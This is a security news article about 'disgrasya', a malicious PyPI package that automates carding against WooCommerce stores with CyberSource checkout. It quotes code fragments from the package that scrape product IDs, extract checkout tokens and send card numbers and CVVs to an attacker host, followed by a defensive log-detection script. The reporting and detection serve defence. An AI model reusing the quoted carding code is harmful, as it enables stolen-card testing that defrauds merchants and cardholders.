Malicious PyPI Package With Fully Automated Carding Script Attacking E-commerce Websites

A sophisticated malicious Python package named “disgrasya” has been discovered on the PyPI repository, containing a fully automated carding script specifically targeting WooCommerce stores.

This package, whose name translates to “disaster” in Filipino slang, enables attackers to test stolen credit card information against real e-commerce payment systems with minimal technical expertise required.

The malicious code executes a stealth attack by emulating legitimate customer checkout behavior, making it particularly difficult for fraud detection systems to identify and block.

Unlike typical supply chain attacks relying on typosquatting or deceptive naming, “disgrasya” made no attempt to disguise its malicious nature.

Instead, it openly served as a distribution mechanism for fraudsters seeking to validate stolen credit card information.

The package specifically targets merchants using WooCommerce with CyberSource as their payment gateway, creating a specialized attack vector against these widely-used e-commerce systems.

Socket.dev researchers identified that the package had been downloaded over 34,860 times before discovery, indicating widespread distribution among potential attackers.

The malicious payload first appeared in version 7.36.9, with all subsequent versions carrying the same embedded attack logic. This substantial download count suggests the tool may already be in active use across numerous fraud campaigns.

The carding attack facilitated by this package represents a growing financial threat to businesses.

Industry research estimates online payment fraud will cost merchants over $362 billion globally between 2023 and 2028, with annual losses nearly doubling from $38 billion in 2023 to $91 billion by 2028—a 140% increase.

Attack Mechanism: Multi-Stage Checkout Simulation

The malware operates through a carefully orchestrated multi-stage process designed to mimic legitimate customer behavior while validating stolen credit card information.

Initially, the script identifies a product on the target WooCommerce store by extracting a product ID through a simple GET request and naive string-splitting of the returned HTML:

url = f"https://{domain}/?=&post_type=product"
response = session.get(url, proxies=proxy)
split_text = response.text.split('data-product_id="')
id = split_text[1].split('"')[0]

After identifying a product, the script adds it to a cart via WooCommerce’s AJAX endpoint, simulating a standard shopping process.

It then extracts two critical security tokens from the checkout page, the CSRF nonce and the CyberSource capture_context, both of which are required for a legitimate payment to be processed:

url = f"https://{domain}/checkout/"
response = session.get(url, proxies=proxy)
checkoutNonce = response.text.split('name="woocommerce-process-checkout-nonce" value="')[1].split('"')[0]
capture_context = response.text.split('"capture_context":"')[1].split('"')[0]

The most concerning aspect is the exfiltration of the stolen card data to an attacker-controlled server (railgunmisaka.com), where the data is tokenized before being submitted to the payment gateway:

url = "https://www.railgunmisaka.com/cybersourceFlexV2"
headers = {
    "Accept": "application/json",
    "Content-Type": "application/json"
}
data = {
    "card": f"{cc}|{mm}|{yy}|{cvv}",
    "capture_context": capture_context
}

What makes this attack particularly dangerous is its close simulation of legitimate checkout behavior. Every action, from browsing products to completing payment, follows normal user patterns that rarely trigger fraud detection systems.

The script even uses randomized customer information and handles both successful and failed transactions appropriately, making detection exceptionally difficult.

While this specific package has been removed from PyPI, the technique remains viable and could reappear under different package names, highlighting the need for enhanced security monitoring for both Python package repositories and e-commerce checkout systems.
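One place the pattern described above is still visible is the merchant's own web server log: the script hits a fixed product-discovery URL (the `/?=&post_type=product` request quoted earlier), then repeats add-to-cart and checkout far faster than a human shopper. The following detection sketch is an added example, not code from the article or the package; it assumes Common Log Format access logs and that the checkout submission lands on WooCommerce's `/?wc-ajax=checkout` endpoint, and the log lines are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample access-log lines (not real traffic): 203.0.113.5 replays the
# script's fixed sequence six times in under half a minute; 198.51.100.7 is a normal shopper.
SEQUENCE = [("GET", "/?=&post_type=product"), ("POST", "/?wc-ajax=add_to_cart"),
            ("GET", "/checkout/"), ("POST", "/?wc-ajax=checkout")]
SAMPLE_LOG = "\n".join(
    f'203.0.113.5 - - [01/Apr/2025:10:00:{4 * i + j:02d} +0000] "{m} {p} HTTP/1.1" 200 500'
    for i in range(6) for j, (m, p) in enumerate(SEQUENCE)
) + (
    '\n198.51.100.7 - - [01/Apr/2025:10:01:00 +0000] "GET /product/blue-shirt/ HTTP/1.1" 200 9000'
    '\n198.51.100.7 - - [01/Apr/2025:10:02:30 +0000] "POST /?wc-ajax=add_to_cart HTTP/1.1" 200 300'
    '\n198.51.100.7 - - [01/Apr/2025:10:03:10 +0000] "GET /checkout/ HTTP/1.1" 200 8800'
    '\n198.51.100.7 - - [01/Apr/2025:10:04:00 +0000] "POST /?wc-ajax=checkout HTTP/1.1" 200 400'
)

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*"')
ENUM_PATH = "/?=&post_type=product"   # product-discovery URL used by the script (from the article)
CHECKOUT_POST = "/?wc-ajax=checkout"  # assumed WooCommerce AJAX checkout endpoint

def parse(log):
    """Yield (ip, timestamp, method, path) for each well-formed CLF line."""
    for line in log.splitlines():
        m = LOG_RE.match(line)
        if m:
            ip, ts, method, path = m.groups()
            yield ip, datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), method, path

def find_carding_clients(log, window_s=300, min_checkouts=3):
    """Return {ip: reason} for clients whose traffic matches the carding pattern."""
    by_ip = defaultdict(list)
    for ip, ts, method, path in parse(log):
        by_ip[ip].append((ts, method, path))
    flagged = {}
    for ip, evs in by_ip.items():
        evs.sort()
        checkouts = [t for t, m, p in evs if m == "POST" and p == CHECKOUT_POST]
        # Burst: any run of min_checkouts checkout submissions inside window_s seconds.
        burst = any((checkouts[i + min_checkouts - 1] - checkouts[i]).total_seconds() <= window_s
                    for i in range(len(checkouts) - min_checkouts + 1))
        enum = any(p == ENUM_PATH for _, _, p in evs)
        if burst and enum:
            flagged[ip] = f"{len(checkouts)} checkout POSTs plus product-enumeration URL"
        elif burst:
            flagged[ip] = f"{len(checkouts)} checkout POSTs within {window_s}s"
        elif enum:
            flagged[ip] = "product-enumeration URL seen (no checkout burst)"
    return flagged
```

The enumeration URL alone is a low-confidence signal, so the function reports it separately; the burst of checkout submissions is what distinguishes card testing from a shopper retrying a declined card once or twice.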

Tushar Subhra Dutta